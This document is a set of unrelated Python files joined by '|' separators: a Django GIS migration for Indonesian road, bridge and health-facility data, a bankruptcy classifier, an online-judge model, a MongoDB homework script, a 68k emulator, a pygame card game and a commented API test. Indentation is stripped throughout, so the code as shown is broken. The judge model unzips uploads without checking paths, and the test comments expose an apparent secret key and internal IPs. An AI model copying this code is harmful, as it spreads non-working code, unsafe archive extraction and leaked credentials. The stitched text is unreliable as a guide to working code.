# Generated by Django 3.0.8 on 2020-07-10 10:50
import django.contrib.gis.db.models.fields
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Drainase',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('lcode', models.CharField(max_length=50)),
('shape_leng', models.FloatField()),
('rpru', models.CharField(max_length=100)),
('kemiringan', models.IntegerField()),
('panjang_m', models.IntegerField()),
('kdlmn_m', models.IntegerField()),
('kondisi', models.CharField(max_length=50)),
('tahun', models.IntegerField()),
('anggaran', models.BigIntegerField()),
('kontraktor', models.CharField(max_length=50)),
('surv_time', models.DateField()),
('geom', django.contrib.gis.db.models.fields.LineStringField(srid=4326)),
],
options={
'verbose_name_plural': 'Drainase',
},
),
migrations.CreateModel(
name='Jalan',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('remark', models.CharField(max_length=250)),
('shape_leng', models.FloatField()),
('surveyor', models.CharField(max_length=250)),
('surv_time', models.DateField()),
('number', models.IntegerField()),
('name', models.CharField(max_length=250)),
('length_km', models.BigIntegerField()),
('width_m', models.BigIntegerField()),
('tpp', models.CharField(max_length=250)),
('tpu', models.CharField(max_length=250)),
('lhr', models.IntegerField()),
('status', models.CharField(max_length=100)),
('surf_type', models.CharField(max_length=100)),
('kondisi', models.CharField(max_length=100)),
('hambatan', models.CharField(max_length=100)),
('tahun', models.IntegerField()),
('anggaran', models.BigIntegerField()),
('geom', django.contrib.gis.db.models.fields.LineStringField(srid=4326)),
],
options={
'verbose_name_plural': 'Jalan',
},
),
migrations.CreateModel(
name='Jembatan',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('surveyor', models.CharField(max_length=100)),
('surv_date', models.DateField()),
('nama', models.CharField(max_length=100)),
('pal_km', models.IntegerField()),
('panjang_m', models.BigIntegerField()),
('lebar_m', models.BigIntegerField()),
('bentang', models.IntegerField()),
('tipe_jem', models.CharField(max_length=100)),
('penyebrang', models.CharField(max_length=100)),
('bhn_konstr', models.CharField(max_length=50)),
('kondisi', models.CharField(max_length=100)),
('tahun', models.IntegerField()),
('anggaran', models.BigIntegerField()),
('geom', django.contrib.gis.db.models.fields.PointField(srid=4326)),
],
options={
'verbose_name_plural': 'Jembatan',
},
),
migrations.CreateModel(
name='Kab_Sidrap',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('provinsi', models.CharField(max_length=40)),
('kecamatan', models.CharField(max_length=40)),
('desa', models.CharField(max_length=40)),
('sumber', models.CharField(max_length=50)),
('kode2010', models.CharField(max_length=10)),
('provno', models.CharField(max_length=2)),
('kabkotno', models.CharField(max_length=2)),
('kecno', models.CharField(max_length=3)),
('desano', models.CharField(max_length=3)),
('kabkot', models.CharField(max_length=50)),
('geom', django.contrib.gis.db.models.fields.MultiPolygonField(srid=4326)),
],
options={
'verbose_name_plural': 'Batas Administrasi',
},
),
migrations.CreateModel(
name='Kesehatan',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('namobj', models.CharField(max_length=250)),
('remark', models.CharField(max_length=250)),
('alamat', models.CharField(max_length=250)),
('jml_dktr', models.IntegerField()),
('jml_prwt', models.IntegerField()),
('jml_pasien', models.IntegerField()),
('jml_ruang', models.IntegerField()),
('fasilitas', models.CharField(max_length=250)),
('kond_bgnn', models.CharField(max_length=100)),
('tahun', models.IntegerField()),
('anggaran', models.BigIntegerField()),
('sumb_dana', models.CharField(max_length=50)),
('kontraktor', models.CharField(max_length=100)),
('surv_time', models.DateField()),
('geom', django.contrib.gis.db.models.fields.PointField(srid=4326)),
],
options={
'verbose_name_plural': 'Fasilitas Kesehatan',
},
),
]
|
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 14 13:17:40 2020
@author: 60342
"""
# In[1]: Import several important libs.
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from patsy import dmatrices
from sklearn import metrics
from sklearn.metrics import confusion_matrix
get_ipython().magic('matplotlib inline')
# In[2]: Function definition used for data process and model training.
'''Function of splitting the data to features and the labels'''
def preprocessdata(raw_data):
# labels_bankruptcy_flag, bankruptcy_factors = dmatrices('class ~ trans_cf_td + trans_ca_cl + trans_re_ta + trans_ni_ta + trans_td_ta + trans_s_ta + trans_wc_ta + trans_wc_s + trans_c_cl + trans_cl_e + trans_in_s + trans_mve_td',
# raw_data, return_type="dataframe")
labels_bankruptcy_flag=raw_data['class']
labels_bankruptcy_flag=np.array(labels_bankruptcy_flag,dtype=float)
# labels_bankruptcy_flag = np.ravel(labels_bankruptcy_flag)
bankruptcy_factors=raw_data.copy()
bankruptcy_factors=bankruptcy_factors.drop(['class'],axis=1)
# bankruptcy_factors=bankruptcy_factors.drop(['ID'],axis=1)
#
return labels_bankruptcy_flag,bankruptcy_factors
'''Function of calculating performance indexes'''
def performance_indexes(true_labels,predicted_labels, predicted_proba=[]):
print (metrics.accuracy_score(true_labels,predicted_labels))
if len(predicted_proba):
print (metrics.roc_auc_score(true_labels, predicted_proba[:, 1]))
print (metrics.confusion_matrix(true_labels,predicted_labels))
print (metrics.classification_report(true_labels,predicted_labels))
cal_confusion_mat = confusion_matrix(true_labels,predicted_labels)
plt.figure(figsize=(10,6))
sns.heatmap(cal_confusion_mat,
xticklabels=['Non Bankrupt', 'Bankrupt'],
yticklabels=['Non Bankrupt', 'Bankrupt'])
plt.show()
return cal_confusion_mat
'''Function of training bankruptcy model'''
def train_bankruptcy_model(training_data,select_model):
'''2_1.split the training data to features and the labels'''
train_label_bankruptcy_flag,training_bankruptcy_factors=preprocessdata(training_data)
print (training_bankruptcy_factors.columns)
'''2_2.build the selected machine learning model'''
if select_model=='LR':
# Logistic Regression
from sklearn.linear_model import LogisticRegression
model = LogisticRegression()
elif select_model=='Dtree':
# Decision Tree
from sklearn.tree import DecisionTreeClassifier
model = DecisionTreeClassifier()
elif select_model=='MLP':
# MLP Neural Network
from sklearn.neural_network import MLPClassifier
model = MLPClassifier(hidden_layer_sizes=(12,12,12))
elif select_model=='SVM':
# Support Vector Machine
from sklearn.svm import SVC
model = SVC(probability = True)
'''2_3.training model'''
model = model.fit(training_bankruptcy_factors, train_label_bankruptcy_flag)
# check the accuracy on the training set
acc=model.score(training_bankruptcy_factors, train_label_bankruptcy_flag)
print('Evaluation of ',select_model,' model using the training data: ',acc)
# print('Percentage of bankruptcy on training data:',train_label_bankruptcy_flag.mean())
############################## analysis and results ###################################
'''2_4.predict labels of training data using model'''
predicted_train_labels = model.predict(training_bankruptcy_factors)
# print (predicted_train_labels)
'''2_5.probabilities of classification by model'''
proba_training = model.predict_proba(training_bankruptcy_factors)
# print (proba_training)
'''2_6.calculate score, confusion matrix and other performance indexes'''
train_confusion_mat=performance_indexes(train_label_bankruptcy_flag, predicted_train_labels, proba_training)
'''2_7.calculate VIF'''
from statsmodels.stats.outliers_influence import variance_inflation_factor
vif = [variance_inflation_factor(training_bankruptcy_factors.values, i) for i in range(training_bankruptcy_factors.shape[1])]
# print(vif)
return model,vif
'''Function of training bankruptcy model'''
def predict_bankruptcy_result(test_label_bankruptcy_flag,test_bankruptcy_factors,select_model,bankruptcy_model):
############################## analysis and results ###################################
'''2_1.predict labels of testing data using model'''
predicted_test_labels = bankruptcy_model.predict(test_bankruptcy_factors)
print (predicted_test_labels)
acc=bankruptcy_model.score(test_bankruptcy_factors, test_label_bankruptcy_flag)
print('Evaluation of ',select_model,' model on testing bankruptcy data: ',acc)
print('Percentage of bankruptcy on testing bankruptcy data:',test_label_bankruptcy_flag.mean())
'''2_2.probabilities of classification by model'''
proba_testing = bankruptcy_model.predict_proba(test_bankruptcy_factors)
print (proba_testing)
'''2_3.calculate score, confusion matrix and other performance indexes'''
test_confusion_mat=performance_indexes(test_label_bankruptcy_flag, predicted_test_labels, proba_testing)
predicted_test_labels = pd.Series(predicted_test_labels)
return predicted_test_labels,proba_testing
# In[3]: Classification main function with training and testing.
'''load data and preprocess'''
from scipy.io import arff
select_data="1year.arff"
All_bankruptcy_data,meta=arff.loadarff(select_data)
All_bankruptcy_data=pd.DataFrame(All_bankruptcy_data)
All_bankruptcy_data['class']=All_bankruptcy_data['class'].apply(lambda row_x: int(bytes.decode(row_x)))
All_bankruptcy_data = All_bankruptcy_data.drop(columns=['Attr37', 'Attr21'])
All_bankruptcy_data.fillna(0, inplace=True)
'''3_1.select the training data'''
training_bankruptcy_data = All_bankruptcy_data.sample(frac=0.5, random_state=0)
'''3_2.plot the bar graph reflecting the count of two labels -- bankruptcy or not'''
plt.figure(figsize=(10,6))
sns.countplot(x='class',data = training_bankruptcy_data)
plt.show()
'''3_3.load the testing data'''
testing_bankruptcy_data=All_bankruptcy_data.loc[~All_bankruptcy_data.index.isin(training_bankruptcy_data.index)]
testing_bankruptcy_data.head()
'''3_4.plot the bar graph reflecting the count of two labels -- bankruptcy or not'''
plt.figure(figsize=(10,6))
sns.countplot(x='class',data = testing_bankruptcy_data)
plt.show()
'''3_5.split the testing data to features and the labels'''
test_label_bankruptcy_flag,test_bankruptcy_factors=preprocessdata(testing_bankruptcy_data)
# y_test, X_test = dmatrices('class ~ trans_cf_td + trans_ca_cl + trans_re_ta + trans_ni_ta + trans_td_ta + trans_s_ta + trans_wc_ta + trans_wc_s + trans_c_cl + trans_cl_e + trans_in_s + trans_mve_td',
# test_data, return_type="dataframe")
model_name_all=['LR','Dtree','MLP','SVM']
composite_predlabels = pd.DataFrame()
#select_model='LR'
for select_model in model_name_all:
print('------Using ',select_model,' model for training------')
'''3_5.training the bankruptcy model'''
bankruptcy_model,bankruptcy_VIF=train_bankruptcy_model(training_bankruptcy_data,select_model)
'''3_6.testing the bankruptcy testing data'''
predicted_test_labels,proba_testing=predict_bankruptcy_result(test_label_bankruptcy_flag,test_bankruptcy_factors,select_model,bankruptcy_model)
'''3_7.generate composite predictive labels'''
composite_predlabels[select_model] = predicted_test_labels
#print (composite_predlabels)
composite_predicted_bankrupt = composite_predlabels[['LR','MLP','Dtree']].mode(axis=1,numeric_only=True)
#print(composite_predicted_bankrupt)
print (metrics.accuracy_score(test_label_bankruptcy_flag, composite_predicted_bankrupt))
'''3_8.calculate score, confusion matrix and other performance indexes'''
final_test_confusion_mat=performance_indexes(test_label_bankruptcy_flag, composite_predicted_bankrupt)
|
from __future__ import unicode_literals
import os
import zipfile
import time
from django.contrib.auth.models import User
from django.db import models
# Create your models here.
from django.db.models.signals import post_save
from django.dispatch import receiver
from judge import config
def get_image_path(instance, filename):
return os.path.join(str(instance.id), filename)
class Problem(models.Model):
id = models.IntegerField(primary_key=True)
title = models.CharField(max_length=30)
content = models.TextField()
file = models.FileField(upload_to=get_image_path)
memory_limit = models.IntegerField(null=True)
time_limit = models.IntegerField()
upload_date = models.DateField()
submit_times = models.IntegerField(default=0)
accept_times = models.IntegerField(default=0)
input_request = models.TextField()
output_request = models.TextField()
input_sample = models.TextField()
output_sample = models.TextField()
source = models.CharField(max_length=30)
level = models.CharField(max_length=30)
classify = models.CharField(max_length=30)
@receiver(post_save, sender=Problem, dispatch_uid="unzip")
def unzip(sender, instance, **kwargs):
try:
data_dir = os.path.join('data_dir', '%s'%instance.id)
except:
pass
file_list = os.listdir(data_dir)
for file_name in file_list:
if os.path.splitext(file_name)[1] == '.zip':
zip_path = os.path.join('data_dir', '%s' % instance.id, file_name)
file_zip = zipfile.ZipFile(zip_path, 'r')
for file in file_zip.namelist():
file_zip.extract(file, data_dir)
file_zip.close()
os.remove(zip_path)
class Submit(models.Model):
problem_id = models.ForeignKey(Problem)
user_id = models.ForeignKey(User)
submit_time = models.TimeField(auto_now=True)
language = models.CharField(max_length=10)
take_time = models.IntegerField(default=0)
take_memory = models.IntegerField(default=0)
result = models.CharField(max_length=10)
code = models.TextField()
codeLength = models.CharField(max_length=10)
status = models.IntegerField(default=0) |
#!/usr/bin/python
# -*- coding: UTF8 -*-
import pymongo
import sys
# Homework 3.1 · Course M101P
#
# Write a program in the language of your choice that will remove
# the lowest homework score for each student. Since there is a single
# document for each student containing an array of scores, you will
# need to update the scores array and remove the homework.
#
# Note: when run twice, all homework scores will have been removed.
connection = pymongo.MongoClient("mongodb://localhost")
db = connection.school
students = db.students
def remove_lowest_homework_score( scores):
homework_scores = [score for score in scores if score[u"type"] == u"homework"]
lowest = min( [score[u"score"] for score in homework_scores])
return [score for score in scores \
if ( score[u"type"] != u"homework") \
or( score[u"type"] == u"homework" and score[u"score"] != lowest)]
def update_scores( coll, doc_id, new_scores):
try:
coll.update( { "_id": doc_id}, { "$set": { "scores": new_scores }})
except:
print "Unexpected error while updating:", sys.exc_info()[ 0]
def main( argv):
try:
# All students having a score of type "homework" in their scores array
cursor = students.find( { 'scores.type': 'homework' })
except:
print "Unexpected error while finding:", sys.exc_info()[ 0]
for doc in cursor:
id = doc[ "_id"]
scores = doc[ "scores"]
updated_scores = remove_lowest_homework_score( scores)
update_scores( students, id, updated_scores)
print "updated doc %s:\n scores: %s\nnew scores: %s" % ( id, scores, updated_scores)
if __name__ == "__main__":
main(sys.argv[1:]) |
"""
Motorola 68k chip definition
"""
from .memory import Memory
from ..core.enum.register import Register, FULL_SIZE_REGISTERS, ALL_ADDRESS_REGISTERS
from ..core.enum.condition_status_code import ConditionStatusCode
from ..core.models.list_file import ListFile
import typing
import binascii
from ..core.models.memory_value import MemoryValue
from ..core.enum.op_size import OpSize
MAX_MEMORY_LOCATION = 16777216 # 2^24
class M68K:
def __init__(self):
"""
Constructor
"""
self.memory = Memory()
# has the simulation been halted using SIMHALT or .halt()
self.halted = False
# should the clock automatically cycle?
self.clock_auto_cycle = True
self._clock_cycles = 0
# todo add events for each clock cycle
# this is necessary for implementing breakpoints
# and watches for value changes
# set up the registers to their default values
self.registers = {}
self.__init_registers()
def __init_registers(self):
"""
Set the registers to their default values
:return:
"""
# loop through all of the full size registers which are just 32 bits / 4 bytes long
for register in FULL_SIZE_REGISTERS:
self.registers[register] = MemoryValue(OpSize.LONG)
# set up all of the odd registers (in this case, just the Condition Code Register)
# which just uses 5 bits out of the lowermost byte (do we want to allocate it an entire word instead?)
self.registers[Register.ConditionCodeRegister] = MemoryValue(OpSize.BYTE)
# Easy68k initializes the step counter (A7) to 0x1000000 by default, so do the same
self.set_register(Register.A7, MemoryValue(OpSize.LONG, unsigned_int=0x1000000))
def get_register(self, register: Register) -> MemoryValue:
"""
Gets the entire value of a register
:param register:
:return:
"""
return self.registers[register]
def set_register(self, register: Register, val: MemoryValue):
"""
Sets the value of a register using a 32-bit int
:param register:
:param val:
:return:
"""
# if the register is the CCR, use that method to handle setting it
# because of its different size
if register == Register.ConditionCodeRegister:
self._set_condition_code_register_value(val)
return
# if the register is an address register that is limited to fit in the bounds of memory
if register in ALL_ADDRESS_REGISTERS:
self.set_address_register_value(register, val)
return
# now for all other registers
# ensure that the value is within bounds
# actual negative numbers will need to be converted into 32-bit numbers
assert 0 <= val.get_value_unsigned() <= 0xFFFFFFFF, 'The value for registers must fit into 4 bytes!'
# set the value
self.registers[register] = val
def _set_condition_code_register_value(self, val: MemoryValue):
"""
Sets the value for the condition code register
:param val:
:return:
"""
# ensure that the value is within bounds
# since the CCR is just a single byte
assert 0 <= val.get_value_unsigned() <= 0xFF, 'The value for the CCR must fit in a single byte!'
# now set the value
self.registers[Register.ConditionCodeRegister] = val
def get_program_counter_value(self) -> int:
"""
Gets the 32-bit unsigned integer value for the program counter value
:return:
"""
mv = self.get_register(Register.ProgramCounter)
ret = mv.get_value_unsigned()
return ret
def set_address_register_value(self, reg: Register, new_value: MemoryValue):
"""
Sets the value of an address register, so the PC or A0-A7
:param reg:
:param new_value:
:return:
"""
# no longer assert that the address register value is a pointer to memory
# since address register direct modes don't consider the amount of memory
assert reg in ALL_ADDRESS_REGISTERS, 'The register given is not an address register!'
# now set the value of the register
self.registers[reg].set_value_unsigned_int(new_value.get_value_unsigned())
def set_program_counter_value(self, new_value: int):
"""
Sets the value of the program counter
Must be a non negative integer that is less than the maximum location size
:param new_value:
:return:
"""
self.set_address_register_value(Register.ProgramCounter, MemoryValue(OpSize.LONG, unsigned_int=new_value))
def increment_program_counter(self, inc: int):
"""
Increments the program counter by the given value
:param inc:
:return:
"""
self.set_program_counter_value(
self.get_program_counter_value() + inc)
def get_condition_status_code(self, code: ConditionStatusCode) -> bool:
"""
Gets the status of a code from the Condition Code Register
:param code:
:return:
"""
ccr = self.get_register(Register.CCR).get_value_unsigned()
# ccr is only 1 byte, bit mask away the bit being looked for
return (ccr & code) > 0
def set_condition_status_code(self, code: ConditionStatusCode, value: bool):
"""
Sets the status of a code from the Condition Code Register to value
:param code:
:return:
"""
ccr = self.get_register(Register.CCR)
v = ccr.get_value_unsigned()
if value:
v |= code
else:
v &= ~code
self._set_condition_code_register_value(MemoryValue(OpSize.BYTE, unsigned_int=v))
def run(self):
"""
Starts the automatic execution
:return:
"""
if not self.halted:
if not self.clock_auto_cycle:
# run a single instruction
self.step_instruction()
else:
while self.clock_auto_cycle:
self.step_instruction()
def halt(self):
"""
Halts the auto simulation execution
:return:
"""
self.clock_auto_cycle = False
self.halted = True
def step_instruction(self):
"""
Increments the clock until the program
counter increments
:return:
"""
if not self.halted:
# must be here or we get circular dependency issues
from ..core.util.find_module import find_opcode_cls, valid_opcodes
for op_str in valid_opcodes:
op_class = find_opcode_cls(op_str)
# We don't know this opcode, there's no module for it
if op_class is None:
print('Opcode {} is not known: skipping and continuing'.format(op_str))
assert False
continue
# 10 comes from 2 bytes for the op and max 2 longs which are each 4 bytes
# note: this currently has the edge case that it will fail unintelligibly
# if encountered at the end of memory
pc_val = self.get_program_counter_value()
op = op_class.disassemble_instruction(self.memory.memory[pc_val:pc_val+10])
if op is not None:
op.execute(self)
# done exeucting after doing an operation
return
def reload_execution(self):
"""
restarts execution of the program
up to the current program counter location
:return:
"""
# get the current PC
current_pc = self.get_program_counter_value()
# reset the PC value
# todo, need to store the starting location
# set the starting PC value
# run until hits that PC value
def get_cycles(self):
"""
Returns how many clock cycles have been performed
:return:
"""
return self._clock_cycles
def clear_cycles(self):
"""
Resets the count of clock cycles
:return:
"""
self._clock_cycles = 0
def load_list_file(self, list_file: ListFile):
"""
Load List File
load the contents of a list file into memory
using the locations specified inside of the list file
:param list_file:
:return:
"""
self.memory.load_list_file(list_file)
self.set_program_counter_value(int(list_file.starting_execution_address))
def load_memory(self, file : typing.BinaryIO):
"""
saves the raw memory into the designated file
NOTE: file must be opened as binary or this won't work
"""
self.memory.load_memory(file)
def save_memory(self, file : typing.BinaryIO):
"""
Loads the raw memory from the designated file
This includes programs
NOTE: file must be opened as binary or this won't work
"""
self.memory.save_memory(file)
def set_ccr_reg(self, extend, negative, zero, overflow, carry):
"""
Accepts Boolean values for X,N,Z,V, and C, respectively and sets the CCR accordingly.
Passing None in for any argument will cause it to ignore that bit.
Returns nothing.
:param extend:
:param negative:
:param zero:
:param overflow:
:param carry:
:return:
"""
if extend is not None:
extend = bool(extend)
self.set_condition_status_code(ConditionStatusCode.X, extend)
if negative is not None:
negative = bool(negative)
self.set_condition_status_code(ConditionStatusCode.N, negative)
if zero is not None:
zero = bool(zero)
self.set_condition_status_code(ConditionStatusCode.Z, zero)
if overflow is not None:
overflow = bool(overflow)
self.set_condition_status_code(ConditionStatusCode.V, overflow)
if carry is not None:
carry = bool(carry)
self.set_condition_status_code(ConditionStatusCode.C, carry)
|
import pygame
import sys
from pygame.locals import *
import Danji_Game_Part
import json
from game import *
import os
class Game_page_C():
def __init__(self,mordern):
self.load()
self.Black = (0,0,0)
self.size = 1012, 596
self.bg_imag = "source/background/Back_Ground3~1.png"
self.GB_img = "source/background/Icon_get_back~1.png"
self.SET_img = "source/background/Icon_Setting~1.png"
self.Game = Game_Rule()
self.P = []
self.P.append(Player("P1"))
self.P.append(Player("AI"))
self.Cards = Card_zu()
self.Place_Area = Placement_Area()
self.name = mordern
self.HeiTao_center = (110 * 2 + 70 ) / 2 , ( 415 * 2 + 100 ) / 2
self.HongXin_center = ( 186 * 2+ 70 ) / 2, ( 415 * 2 + 100 ) / 2
self.FangKuai_center = (262 * 2 + 70) / 2, (415 * 2 + 100) / 2
self.MeiHua_center = (338 * 2 + 70) / 2, (415 * 2 + 100) / 2
self.HeiTao_center_2 = ((947-110) * 2 + 70) / 2, ((596 - 442) * 2 + 100) / 2
self.qipai_center = (535 * 2 + 80) / 2, (280 * 2 + 110) / 2
self.cards_center = (405 * 2 + 80) / 2, (280 * 2 + 110) / 2
self.creat_page()
self.Game_over()
def load(self):
json_path = 'image.json'
f = open(json_path, 'r', encoding='utf-8')
self.img_url_dict = json.load(f)
f.close()
def page_loading(self):
if len(self.P[0].S) > 0:
self.card1 = self.img_url_dict[self.P[0].S[len(self.P[0].S) - 1]]
self.cards1 = pygame.image.load(self.card1).convert_alpha()
self.card1_rect = self.cards1.get_rect()
self.card1_rect.center = self.HeiTao_center
if len(self.P[0].H) > 0:
self.card2 = self.img_url_dict[self.P[0].H[len(self.P[0].H) - 1]]
self.cards2 = pygame.image.load(self.card2).convert_alpha()
self.card2_rect = self.cards2.get_rect()
self.card2_rect.center = self.HongXin_center
if len(self.P[0].D) > 0:
self.card3 = self.img_url_dict[self.P[0].D[len(self.P[0].D) - 1]]
self.cards3 = pygame.image.load(self.card3).convert_alpha()
self.card3_rect = self.cards3.get_rect()
self.card3_rect.center = self.FangKuai_center
if len(self.P[0].C) > 0:
self.card4 = self.img_url_dict[self.P[0].C[len(self.P[0].C) - 1]]
self.cards4 = pygame.image.load(self.card4).convert_alpha()
self.card4_rect = self.cards4.get_rect()
self.card4_rect.center = self.MeiHua_center
if self.P[1].sum > 0:
self.card5 = self.img_url_dict[' ']
self.cards5 = pygame.image.load(self.card5).convert_alpha()
self.card5_rect = self.cards5.get_rect()
self.card5_rect.center = self.HeiTao_center_2
if len(self.Place_Area.card):
card = self.Place_Area.card[len(self.Place_Area.card)-1]
self.card9 = self.img_url_dict.get(card,"source/card/SA.png")
self.cards9 = pygame.image.load(self.card9).convert_alpha()
self.card9_rect = self.cards9.get_rect()
self.card9_rect.center = self.qipai_center
def creat_page(self):
pygame.init()
self.fontObj = pygame.font.Font("source/word_type/word3.TTF", 18)
self.screen = pygame.display.set_mode(self.size)
pygame.display.set_caption(self.name)
self.background = pygame.image.load(self.bg_imag).convert_alpha()
self.GBIMG = pygame.image.load(self.GB_img).convert_alpha()
self.SEIMG = pygame.image.load(self.SET_img).convert_alpha()
self.clock = pygame.time.Clock()
self.who = 0
while(self.Cards.sum):
self.page_loading()
self.screen.blit(self.background, (-20, 0))
self.screen.blit(self.GBIMG, (27, 15))
self.screen.blit(self.SEIMG, (117, 15))
if len(self.P[0].S):
self.screen.blit(self.cards1, self.card1_rect)
if len(self.P[0].H):
self.screen.blit(self.cards2, self.card2_rect)
if len(self.P[0].D):
self.screen.blit(self.cards3, self.card3_rect)
if len(self.P[0].C):
self.screen.blit(self.cards4, self.card4_rect)
if self.P[1].sum:
self.screen.blit(self.cards5, self.card5_rect)
if self.Place_Area.sum:
self.screen.blit(self.cards9,self.card9_rect)
self.screen.blit(self.fontObj.render(f"黑桃:{len(self.P[0].S)}",
False,self.Black),(110,515))
self.screen.blit(self.fontObj.render(f"红心:{len(self.P[0].H)}",
False, self.Black), (186, 515))
self.screen.blit(self.fontObj.render(f"方块:{len(self.P[0].D)}",
False, self.Black), (262, 515))
self.screen.blit(self.fontObj.render(f"梅花:{len(self.P[0].C)}",
False, self.Black), (338, 515))
self.screen.blit(self.fontObj.render(f"AI:{self.P[1].sum}",
False, self.Black), (947-110, 596-442-20))
self.screen.blit(self.fontObj.render(f"弃牌:{self.Place_Area.sum}",
False, self.Black), (535, 390))
self.screen.blit(self.fontObj.render(f"卡组:{self.Cards.sum}",
False, self.Black), (405, 260))
self.screen.blit(self.fontObj.render(f"P{self.who}的回合",
False, self.Black), (150, 150))
pygame.draw.rect(self.screen, self.Black, [110, 415, 70, 100], 1) # P1黑桃
pygame.draw.rect(self.screen, self.Black, [186, 415, 70, 100], 1) # P1心
pygame.draw.rect(self.screen, self.Black, [262, 415, 70, 100], 1) # P1方块
pygame.draw.rect(self.screen, self.Black, [338, 415, 70, 100], 1) # P1梅花
pygame.draw.rect(self.screen, self.Black, [947-110, 596-442, 70, 100], 1) # P2黑桃
pygame.draw.rect(self.screen, self.Black, [40, 25, 80, 30], 1) # fanhui
pygame.draw.rect(self.screen, self.Black, [130, 25, 80, 30], 1) # 设置
pygame.draw.rect(self.screen, self.Black, [535, 280, 80, 110], 1) # 弃牌
pygame.draw.rect(self.screen, self.Black, [405, 280, 80, 110], 1) # 卡组
self.status = 1
while(self.status and self.who == 0):
buttons = pygame.mouse.get_pressed() # 存鼠标状态
x, y = pygame.mouse.get_pos()
card = str()
for event in pygame.event.get():
if event.type == QUIT:
sys.exit()
if x >40 and x < 120 and y > 15 and y < 45 and\
event.type == MOUSEBUTTONDOWN:
Danji_Game_Part.danji_page()
if 110 < x < 180 and 415 < y < 515 and\
event.type == MOUSEBUTTONDOWN and len(self.P[0].S) > 0:
card = self.P[0].Knockout_S() #打出黑桃
if 186< x < 256 and 415 < y < 515 and\
event.type == MOUSEBUTTONDOWN and len(self.P[0].H) > 0:
card = self.P[0].Knockout_H() #打出红心
if 262 < x < 332 and 415 < y < 515 and\
event.type == MOUSEBUTTONDOWN and len(self.P[0].D) > 0:
card = self.P[0].Knockout_D() #打出方块
if 338 < x < 408 and 415 < y < 515 and\
event.type == MOUSEBUTTONDOWN and len(self.P[0].C) > 0:
card = self.P[0].Knockout_C() #打出梅花
if 405 < x < 405 + 80 and 280 < y < 280 + 110 and\
event.type == MOUSEBUTTONDOWN:
card = self.Cards.random_card()
if card:
self.Place_Area.Put_in(card)
self.status = 0
pygame.display.update()
while(self.status and self.who):
buttons = pygame.mouse.get_pressed() # 存鼠标状态
x, y = pygame.mouse.get_pos()
card = str()
for event in pygame.event.get():
if event.type == QUIT:
sys.exit()
if x >40 and x < 120 and y > 15 and y < 45 and\
event.type == MOUSEBUTTONDOWN:
Danji_Game_Part.danji_page()
if 405 < x < 405 + 80 and 280 < y < 280 + 110 and\
event.type == MOUSEBUTTONDOWN:
card = self.Cards.random_card()
if card:
self.Place_Area.Put_in(card)
self.status = 0
pygame.display.update()
if len(self.Place_Area.card):
print("Place_Area:",self.Place_Area.card)
if self.Game.Whether_Eat_Cards(self.Place_Area):
self.P[self.who].Eat_Cards(self.Place_Area)
self.who = (self.who+1)%2
pygame.display.update()
self.clock.tick(30)
pygame.quit()
def Game_over(self):
pygame.init()
pygame.display.set_caption("Game over")
os.environ['SDL_VIDEO_CENTERED'] = '1' # 居中显示
screen = pygame.display.set_mode((500,240))
background = pygame.image.load("source/background/登陆界面.gif").convert_alpha()
clock = pygame.time.Clock()
while(1):
screen.blit(background, (0, 0))
fontObj = pygame.font.Font("source/word_type/word3.TTF", 32)
screen.blit(fontObj.render(f"P1:{self.P[0].sum} P2:{self.P[1].sum}",
False, self.Black), (130, 50))
if self.P[0].sum < self.P[1].sum:
screen.blit(fontObj.render("P1 WIN", False, self.Black), (200, 100))
elif self.P[0].sum > self.P[1].sum:
screen.blit(fontObj.render("AI WIN", False, self.Black), (200, 100))
elif self.P[0].sum == self.P[1].sum:
screen.blit(fontObj.render("平局", False, self.Black), (225, 100))
fontObj = pygame.font.Font("source/word_type/word3.TTF", 24)
screen.blit(fontObj.render("继续游戏 结束游戏",
False, self.Black), (130, 200))
pygame.draw.rect(screen, self.Black, [130, 200, 24*4, 24], 1)
pygame.draw.rect(screen, self.Black, [130+24*6.5, 200, 24*4, 24], 1)
for event in pygame.event.get():
if event.type == QUIT:
sys.exit()
buttons = pygame.mouse.get_pressed() # 存鼠标状态
x, y = pygame.mouse.get_pos()
if 130 < x < 130 +24*4 and 200 < y < 200 +24 and \
event.type == MOUSEBUTTONDOWN:
pygame.quit()
Game_page_C('PVE')
if 130+24*6.5 < x < 130 +24*10.5 and 200 < y < 200 +24 and \
event.type == MOUSEBUTTONDOWN:
pygame.quit()
Danji_Game_Part.danji_page()
pygame.display.update()
clock.tick(30)
|
'''
思路: 1、单个api请求能成功
request进行请求
2、用unittest
获取key,syestemd的请求独立成一个函数,方便调用
每个接口写成一个单独的类
3、htmlrunner生成测试报告
'''
#
# #time
# #
# import unittest,requests,hashlib,time,json
# class Api_all(unittest.TestCase):
# def setUp(self):
# self.time =str(int(time.time()*1000))
# m2 =hashlib.md5()
# scr = '722d50a9-28d4-4cba-b226-ca1f1115f37d'+ self.time
# m2.update(scr.encode('utf-8'))
# self.ticket = m2.hexdigest()
# # header = {'publisherId':'1386833104009','timestamp':time1,'ticket':ticket,'systemId':'469b235f-3ef1-4472-9892-055af1ede259'}
# self.header = {'publisherId':'1386833104009','timestamp':self.time,'ticket':self.ticket,'systemId':'469b235f-3ef1-4472-9892-055af1ede259'}
# def test_001(self):
# r= requests.get(url='http://172.16.5.162:8080/mpr/portal-mcrs-openapi/mvc/mprcode/getVendorInfo',headers=self.header,params={'typeId':'0','clientType':'mpr'})
# # print(r.json())
# a= (r.content).decode('utf-8')
# print(json.loads(a).get('respCode'))
# # print((r.content).decode('utf-8'))
# # print(json.loads(r.content))
# # # print(eval(r.text).get('respCode'))
# # a = json.loads(r.text)
# # print(type(a))
# # # a = exec('c='+r.content)
# # # print(a.get('respCode'))
#
#
# # print(self.resp)
#
# def tearDown(self):
# pass
#
# from selenium import webdriver
#
# import time
#
# ob = webdriver.Firefox()
# ob.get("http://172.16.3.112:8080/versionserver/static/index.html#/publish/login")
# time.sleep(6)
#
# ob.find_element_by_tag_name("button").click()
import random
